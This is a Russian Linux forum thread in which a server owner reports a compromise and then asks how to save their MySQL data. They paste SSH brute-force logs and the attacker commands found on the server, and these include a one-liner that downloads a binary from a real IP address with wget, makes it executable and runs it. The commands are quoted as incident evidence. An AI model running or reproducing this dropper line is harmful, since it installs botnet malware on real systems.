LINUX.ORG.RU

Взлом

 , ,


1

2

Добрый день. Пришло письмо от некого зарубежного провайдера про мой ip:

Note: Local timezone is +0100 (CET) Jan 13 11:29:35 milhouse64 sshd[23013]: reverse mapping checking getaddrinfo for [...] failed - POSSIBLE BREAK-IN ATTEMPT! Jan 13 11:29:35 milhouse64 sshd[23013]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=... user=root Jan 13 11:29:37 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2 Jan 13 11:29:39 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2 Jan 13 11:29:41 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2 Jan 13 11:29:43 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2 Jan 13 11:29:46 milhouse64 sshd[23013]: Failed password for root from ... port 2427 ssh2 Jan 13 11:29:47 milhouse64 sshd[23013]: Failed password for root from 9... port 2427 ssh2 Jan 13 11:29:47 milhouse64 sshd[23013]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=... user=root

Дальше интереснее. Посмотрел на сервере и ужаснулся:

/bin/busybox cp; /gisdfoewrsfdf mount ;/gisdfoewrsfdf echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon echo -e '\x47\x72\x6f\x70/sys/kernel/security' > /sys/kernel/security/.nippon; cat /sys/kernel/security/.nippon; rm -f /sys/kernel/security/.nippon echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; cat /run/.nippon; rm -f /run/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; cat /sys/fs/cgroup/.nippon; rm -f /sys/fs/cgroup/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; cat /sys/fs/cgroup/systemd/.nippon; rm -f /sys/fs/cgroup/systemd/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; cat /sys/fs/cgroup/cpuset/.nippon; rm -f /sys/fs/cgroup/cpuset/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon; cat /sys/fs/cgroup/cpu,cpuacct/.nippon; rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/memory' > /sys/fs/cgroup/memory/.nippon; cat /sys/fs/cgroup/memory/.nippon; rm -f /sys/fs/cgroup/memory/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; cat /sys/fs/cgroup/devices/.nippon; rm -f /sys/fs/cgroup/devices/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; cat /sys/fs/cgroup/freezer/.nippon; rm -f /sys/fs/cgroup/freezer/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; cat /sys/fs/cgroup/net_cls/.nippon; rm -f /sys/fs/cgroup/net_cls/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; cat /sys/fs/cgroup/blkio/.nippon; rm -f /sys/fs/cgroup/blkio/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/perf_event' > /sys/fs/cgroup/perf_event/.nippon; cat /sys/fs/cgroup/perf_event/.nippon; rm -f /sys/fs/cgroup/perf_event/.nippon echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/hugetlb' > /sys/fs/cgroup/hugetlb/.nippon; cat /sys/fs/cgroup/hugetlb/.nippon; rm -f /sys/fs/cgroup/hugetlb/.nippon echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon; cat /sys/kernel/debug/.nippon; rm -f /sys/kernel/debug/.nippon echo -e '\x47\x72\x6f\x70/dev/hugepages' > /dev/hugepages/.nippon; cat /dev/hugepages/.nippon; rm -f /dev/hugepages/.nippon echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; cat /dev/mqueue/.nippon; rm -f /dev/mqueue/.nippon echo -e '\x47\x72\x6f\x70/db' > /db/.nippon; cat /db/.nippon; rm -f /db/.nippon echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon; cat /boot/.nippon; rm -f /boot/.nippon /gisdfoewrsfdf cat /bin/echo ;/gisdfoewrsfdf cd /; wget http://217.23.10.181/bins/usb_bus.x86 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;/gisdfoewrsfdf /gisdfoewrsfdf sudo /bin/sh

И так несколько раз. На сервере крутиться mysql, пока его приостановил и отключил выход в интернет, он мне там не нужен.

На сколько понял нужно сделать mysqldump и грохнуть его совсем. Можно ли просто скопировать файлы базы, без дампа?


Можно ли просто скопировать файлы базы, без дампа?

Если версия нового mysql будет точно такой же.

TDrive ★★★★★ ()
Ответ на: комментарий от marrt

Если только файлы баз копировать, то нет.

Deleted ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.